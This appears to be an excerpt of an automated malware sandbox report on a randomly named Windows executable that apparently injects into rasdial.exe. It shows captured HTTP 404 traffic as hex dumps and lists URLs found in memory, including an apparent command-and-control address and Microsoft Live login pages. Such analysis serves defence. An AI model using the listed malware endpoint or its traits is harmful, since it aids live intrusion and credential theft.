6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 32194227-f289-49e5-a354-8ffd0dbdfa7ex-runtime: 0.024051content-length: 27175connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 03:21:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENBQHX0pD2lIa61j6uhTrIeqLBEdPaIbEHzGbBHND1vtsKvcGzuDIB8syMZ6CglSQf3W2nQ%2FEV8Ld9mFjqe7KhLMl60WXopMLkTAnYLgCR5hvRi%2F4%2FZ7gYJVNux0pz8DtsgJLB3luIj7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e554fb9cf0072ad-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1954&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=748&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 69 3a 9e ce Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['\|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0fi:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 03:21:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ByT08AV%2BOvmYByFpasqkVTX6Z2C6CbU8SU212SnifY5SupVdY4fDH%2BhgP1NzKit7ZstAMzIh8gaek6vMismXWsAEmSiUKPWnCUoM5EXv5ToYRp%2B%2FdIJGHWoVPF7TVUOeuNfc31n0cXxf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e554fc9bcbfc333-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1669&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=768&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba 12 66 ed 8b f7 69 3a Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['\|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0fi:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 03:21:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YiimYCuvOKWT%2BCuFvduxDE%2FrojzLep9fL3FYb02ahFo4U8JYMCeGcd4owZJp3G%2FBKvgdCyvPqtGNWOJpUx58d%2BgJkICMc%2B9O7bfyxOIeE9hrt3NcCzrM274PsicJUugI%2BHR80LFy5Crm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e554fd98b36c34a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1633&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10850&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb 04 c6 13 0b a5 69 67 0a 68 d0 30 ba Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['\|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mqigh0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 03:21:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T6ddLPlEHXJk5m4ldJD7Sz%2BY%2FKbZrQWUMSn0C0%2F8%2BTSfkKSsBvhXu%2BHAiQhLbd7m3OsiqM8NEbUxCKjf0XSVwQLlq%2FjChYkQ9ZAHTiwEN25g5CYQtgV5NdLLf0JSiVlyQpPW8209j6Rz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e554fe9af091906-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1475&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; h
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 20 Nov 2024 03:22:04 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-20T03:22:09.0450577Z

Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4145847136.0000000006AA3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.soainsaat.xyz
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4145847136.0000000006AA3000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.soainsaat.xyz/gqm1/
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000004EAA000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://adm.tools/?page=5
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.00000000054F2000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006362000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=parked
Source: rasdial.exe, 00000006.00000002.4141193170.0000000003065000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: rasdial.exe, 00000006.00000002.4141193170.0000000003087000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: rasdial.exe, 00000006.00000002.4141193170.0000000003065000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: rasdial.exe, 00000006.00000002.4141193170.0000000003065000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033O
Source: rasdial.exe, 00000006.00000002.4141193170.0000000003065000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: rasdial.exe, 00000006.00000003.2162485608.0000000007F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: rasdial.exe, 00000006.00000002.4144451817.0000000007F8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000004B86000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.00000000059F6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.00000000059A8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006818000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hostgator.com.br
Source: rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=parked
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4144186711.0000000005CCC000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000006.00000002.4144340382.0000000007CB0000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4142702296.0000000006B3C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=parked
